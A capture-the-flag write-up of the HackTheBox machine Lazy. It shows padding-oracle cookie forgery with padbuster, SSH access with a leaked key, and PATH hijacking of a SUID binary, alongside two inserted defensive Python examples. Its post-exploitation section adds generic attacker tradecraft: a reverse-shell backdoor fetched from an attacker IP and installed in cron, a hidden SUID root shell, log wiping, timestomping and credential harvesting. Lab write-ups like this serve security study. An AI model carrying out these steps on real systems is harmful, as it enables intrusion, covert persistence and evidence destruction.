HackTheBox Lazy

Writeup for HackTheBox Lazy

Machine Synopsis

Key Exploitation Techniques:

  • Padding Oracle Attack (AES-CBC session cookie manipulation)
  • SSH key discovery via admin panel access
  • SSH authentication bypass (PubkeyAcceptedKeyTypes)
  • SUID binary exploitation (PATH hijacking via unsafe external command execution)

Reconnaissance & Enumeration

Port Discovery

$ nmap -sC -sV -A 10.10.10.18
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))

Web Application Analysis

The website hosts a “CompanyDev” portal with login and registration functionality. SQL injection tests against the login form show no direct vulnerabilities.

# Test for SQL injection
$ sqlmap -r login_request.txt --batch
[CRITICAL] all tested parameters do not appear to be injectable.

Directory Enumeration

$ gobuster dir -u http://10.10.10.18 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php
/images               (Status: 301)
/index.php            (Status: 200)
/login.php            (Status: 200)
/register.php         (Status: 200)
/logout.php           (Status: 302)

Exploitation

Padding Oracle Discovery

Registration sets an auth cookie. Modifying this cookie makes the server respond with an “incorrect padding” error, a response that differs from the one for an untouched cookie; that distinguishable error is what makes the endpoint a padding oracle.

[Screenshot: auth_cookie]

[Screenshot: auth_cookie_incorrect]

Cookie Analysis:

  • Normal cookie: IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs
  • Modified cookie: Results in padding error

Padding Oracle Attack

# Decrypt existing auth cookie to understand format
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0

[+] Decrypted value (ASCII): user=shiro
# Encrypt new plaintext for admin access
$ padbuster http://10.10.10.18/index.php IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs 8 -cookies auth=IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs -encoding 0 -plaintext user=admin

[+] Encrypted value is: BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA
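
To make the oracle concrete from the server's side, here is an added example (not code from the writeup or from the target): a minimal CBC cookie scheme in which the vulnerable handler reports a padding failure differently from a well-formed but meaningless cookie, beside an encrypt-then-MAC handler that rejects every modified cookie identically. The block cipher is a keyed-XOR stand-in for AES, and KEY, IV and the cookie layout are constructed assumptions; the 8-byte block size is the one padbuster was given above.

```python
import hashlib, hmac

BLOCK = 8                                            # padbuster was run with block size 8
KEY, IV = b"constructed-demo-key", bytes(range(8))   # constructed key; fixed IV for determinism

def _block_perm(block: bytes) -> bytes:
    # Stand-in for the real block cipher (AES on the box): a keyed XOR is invertible,
    # and CBC's bit-flipping behaviour is the same whatever cipher sits underneath.
    return bytes(b ^ k for b, k in zip(block, hashlib.sha256(KEY).digest()[:BLOCK]))

def pkcs7_unpad(data: bytes) -> bytes:
    n = data[-1]
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("incorrect padding")
    return data[:-n]

def cbc_encrypt(plaintext: bytes) -> bytes:
    n = BLOCK - len(plaintext) % BLOCK               # PKCS#7 padding
    padded, prev, out = plaintext + bytes([n]) * n, IV, IV
    for i in range(0, len(padded), BLOCK):
        prev = _block_perm(bytes(p ^ c for p, c in zip(padded[i:i + BLOCK], prev)))
        out += prev
    return out                                       # IV || C1 || C2 ...

def cbc_decrypt(ciphertext: bytes) -> bytes:
    out = b""
    for i in range(BLOCK, len(ciphertext), BLOCK):
        dec = _block_perm(ciphertext[i:i + BLOCK])
        out += bytes(d ^ c for d, c in zip(dec, ciphertext[i - BLOCK:i]))
    return out                                       # still padded

def vulnerable_server(cookie: bytes) -> str:
    # Padding is checked first and its failure is reported differently from a
    # well-padded but meaningless cookie: that difference is the oracle.
    try:
        body = pkcs7_unpad(cbc_decrypt(cookie))
    except ValueError:
        return "incorrect padding"
    return "welcome " + body[5:].decode("ascii", "replace") if body[:5] == b"user=" else "bad cookie"

def issue_hardened_cookie(user: str) -> bytes:
    ct = cbc_encrypt(b"user=" + user.encode())
    return ct + hmac.new(KEY, ct, hashlib.sha256).digest()   # encrypt-then-MAC

def hardened_server(cookie: bytes) -> str:
    # Verify the tag in constant time before decrypting, so modified data never reaches the padding check.
    ct, tag = cookie[:-32], cookie[-32:]
    if not hmac.compare_digest(hmac.new(KEY, ct, hashlib.sha256).digest(), tag):
        return "bad cookie"
    return "welcome " + pkcs7_unpad(cbc_decrypt(ct))[5:].decode("ascii")
```

Flipping a byte in the first block of cbc_encrypt(b"user=shiro") leaves the padding intact and yields "bad cookie", while flipping the last byte of the second block corrupts the padding and yields "incorrect padding"; the hardened handler answers "bad cookie" to both.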

Admin Panel Access

Replace the browser session cookie with BAitGdYuupMjA3gl1aFoOwAAAAAAAAAA to gain administrative access.

[Screenshot: admin_login]

SSH Key Discovery

The admin dashboard contains a “My Key” link providing an RSA private key named mysshkeywithnamemitsos.

[Screenshot: rsa_key]

# Download SSH key
$ wget -O id_rsa http://10.10.10.18/mysshkeywithnamemitsos
$ chmod 600 id_rsa

SSH Authentication Bypass

# The first attempt fails because client and server share no signature algorithm:
# current OpenSSH clients disable ssh-rsa (SHA-1) signatures by default, and this
# OpenSSH 6.6.1 server offers no rsa-sha2-* alternative for the key
$ ssh -i id_rsa mitsos@10.10.10.18
sign_and_send_pubkey: no mutual signature supported

# Re-enable the legacy ssh-rsa algorithm on the client for this connection only
$ ssh -i id_rsa mitsos@10.10.10.18 -o PubkeyAcceptedKeyTypes=+ssh-rsa
mitsos@LazyClown:~$

Privilege Escalation

SUID Binary Discovery

mitsos@LazyClown:~$ ls -la
-rwsrwsr-x 1 root   root   7303 May  3  2017 backup

Binary Analysis

mitsos@LazyClown:~$ ./backup 
root:$6$v1daFgo/$.7m9WXOoE4CKFdWvC.8A9aaQ334avEU8KHTmhjjGXMl0CTvZqRfNM5NO2/.7n2WtC58IUOMvLjHL0j4Os...

mitsos@LazyClown:~$ strings backup 
cat /etc/shadow

Vulnerability: the binary invokes cat by bare name rather than by absolute path and runs as root without resetting PATH, so whichever cat appears first in the caller's PATH executes with root privileges (PATH hijacking).
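
The defender's counterpart to the strings check above, as an added example that is not part of the original writeup: a small Python audit that lists setuid-root binaries whose embedded strings invoke a utility by bare name, the exact pattern that strings backup exposed. SAMPLE_IMAGE is a constructed stand-in for the binary's bytes, and SHELL_UTILS is an assumed list of commonly shelled-out programs.

```python
import os
import re
import stat

# Printable runs of 4+ bytes: the same heuristic strings(1) uses.
_PRINTABLE = re.compile(rb"[\x20-\x7e]{4,}")
# Programs a privileged binary commonly shells out to (assumed list; extend it).
SHELL_UTILS = frozenset({"cat", "sh", "bash", "cp", "mv", "ls", "rm", "tar",
                         "gzip", "chmod", "chown", "find", "mail"})

def is_setuid_root(st_mode: int, st_uid: int) -> bool:
    """True for a regular file owned by root with the setuid bit set."""
    return stat.S_ISREG(st_mode) and bool(st_mode & stat.S_ISUID) and st_uid == 0

def bare_commands(data: bytes, utils: frozenset = SHELL_UTILS) -> list:
    """Strings that run a known utility by bare name, e.g. 'cat /etc/shadow';
    '/bin/cat /etc/shadow' is not flagged because PATH plays no part in it."""
    hits = []
    for match in _PRINTABLE.finditer(data):
        text = match.group(0).decode("ascii")
        words = text.split()
        if words and words[0] in utils:
            hits.append(text)
    return hits

def audit_setuid_binaries(root: str) -> dict:
    """Map each setuid-root binary under root to its bare-command strings.
    A hit means the caller's PATH decides which program runs as root; the fix
    is an absolute path plus a PATH the binary sets itself before shelling out."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)              # lstat: symlinks are not regular files
                if not is_setuid_root(st.st_mode, st.st_uid):
                    continue
                with open(path, "rb") as fh:
                    hits = bare_commands(fh.read())
            except OSError:
                continue
            if hits:
                findings[path] = hits
    return findings

# Constructed stand-in for the backup binary's bytes (not the real file).
SAMPLE_IMAGE = (b"\x7fELF\x02\x01\x01" + b"\x00" * 9 + b"cat /etc/shadow\x00"
                + b"/bin/ls -la /root\x00GCC: (Ubuntu 4.8.4-2ubuntu1~14.04) 4.8.4\x00")
```

Running audit_setuid_binaries("/usr") on a host prints nothing for binaries that use absolute paths and lists the offending strings for those that do not; the mode and uid checks use the raw st_mode and st_uid values so they can be exercised without root.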

PATH Hijacking Exploitation

# Modify PATH to prioritize /tmp
mitsos@LazyClown:~$ export PATH=/tmp:$PATH

# Create malicious cat script
mitsos@LazyClown:/tmp$ cat > cat << 'EOF'
#!/bin/sh
/bin/sh
EOF
mitsos@LazyClown:/tmp$ chmod +x cat

# Execute SUID binary to trigger malicious cat
mitsos@LazyClown:~$ ./backup 
# whoami
root
# cat /root/root.txt
489332b5fb06c89a9618f082b1b107a2

Post-Exploitation Techniques

Persistence Methods

SSH Key Persistence

# Generate new SSH key pair
$ ssh-keygen -t rsa -b 4096 -f lazy_persistence

# Add public key to root authorized_keys
# echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQ..." >> /root/.ssh/authorized_keys
# chmod 600 /root/.ssh/authorized_keys

Cron Backdoor

# Create reverse shell payload
$ msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f elf -o backdoor
$ python3 -m http.server 80

# Download and install on target
# wget 10.10.14.6/backdoor -O /tmp/.update
# chmod +x /tmp/.update
# echo "*/10 * * * * /tmp/.update" >> /etc/crontab

SUID Backdoor Maintenance

# Create permanent SUID shell
# cp /bin/bash /tmp/.rootshell
# chmod 4755 /tmp/.rootshell

# Hide with file attributes
# chattr +i /tmp/.rootshell

Defense Evasion

Log Cleanup

# Clear authentication logs
# > /var/log/auth.log
# > /var/log/secure
# > /var/log/wtmp
# > /var/log/lastlog

# Clear command history
# > /root/.bash_history
# > /home/mitsos/.bash_history

Artifact Timestomping

# Match timestamps to system files
# touch -r /bin/ls /tmp/.rootshell
# touch -r /bin/cat /tmp/cat

Lateral Movement Preparation

Network Discovery

# Scan local network
# for i in {1..254}; do ping -c 1 -W 1 192.168.1.$i | grep "64 bytes" | cut -d" " -f4 | tr -d ":"; done

# Port enumeration
# nmap -sT -p- --min-rate 5000 192.168.1.0/24

Credential Harvesting

# Extract password hashes
# cat /etc/shadow > /tmp/shadow.txt

# Search for SSH keys
# find /home -name "*.pem" -o -name "id_*" 2>/dev/null

# Look for stored credentials
# grep -r "password\|pass" /home/*/.*config* 2>/dev/null

Service Enumeration

# List network services
# netstat -tlnp

# Check for running databases
# ps aux | grep -E "(mysql|postgres|mongo)"

# Examine cron jobs
# cat /etc/crontab
# ls -la /etc/cron.*/*

Alternative Exploitation Methods

Manual Padding Oracle

# Manual cookie manipulation for testing
$ python3 -c "
import requests
import base64

# Test various padding scenarios
cookie = 'IxYyntb34ugmMvdXexQbh28%2FZR4JGpPs'
response = requests.get('http://10.10.10.18/index.php', cookies={'auth': cookie + 'A'})
print('Padding error detected' if 'padding' in response.text else 'No error')
"

Alternative SSH Access

# Try different SSH configurations
$ ssh -i id_rsa mitsos@10.10.10.18 -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null

Alternative Privilege Escalation

LinPEAS Enumeration

# Transfer and run LinPEAS
mitsos@LazyClown:/tmp$ wget 10.10.14.6/linpeas.sh
mitsos@LazyClown:/tmp$ chmod +x linpeas.sh
mitsos@LazyClown:/tmp$ ./linpeas.sh

Kernel Exploitation

# Check kernel version
mitsos@LazyClown:/tmp$ uname -a
Linux LazyClown 4.4.0-31-generic #50-Ubuntu SMP Wed Jul 13 00:07:12 UTC 2016 x86_64

# Search for applicable exploits
$ searchsploit linux kernel 4.4 | grep -i privilege

Docker Escape (if applicable)

# Check for Docker environment
mitsos@LazyClown:/tmp$ ls -la /.dockerenv 2>/dev/null && echo "Docker detected"

# Check for privileged containers
mitsos@LazyClown:/tmp$ grep -E "(CapInh|CapPrm|CapEff)" /proc/self/status

This post is licensed under CC BY 4.0 by the author.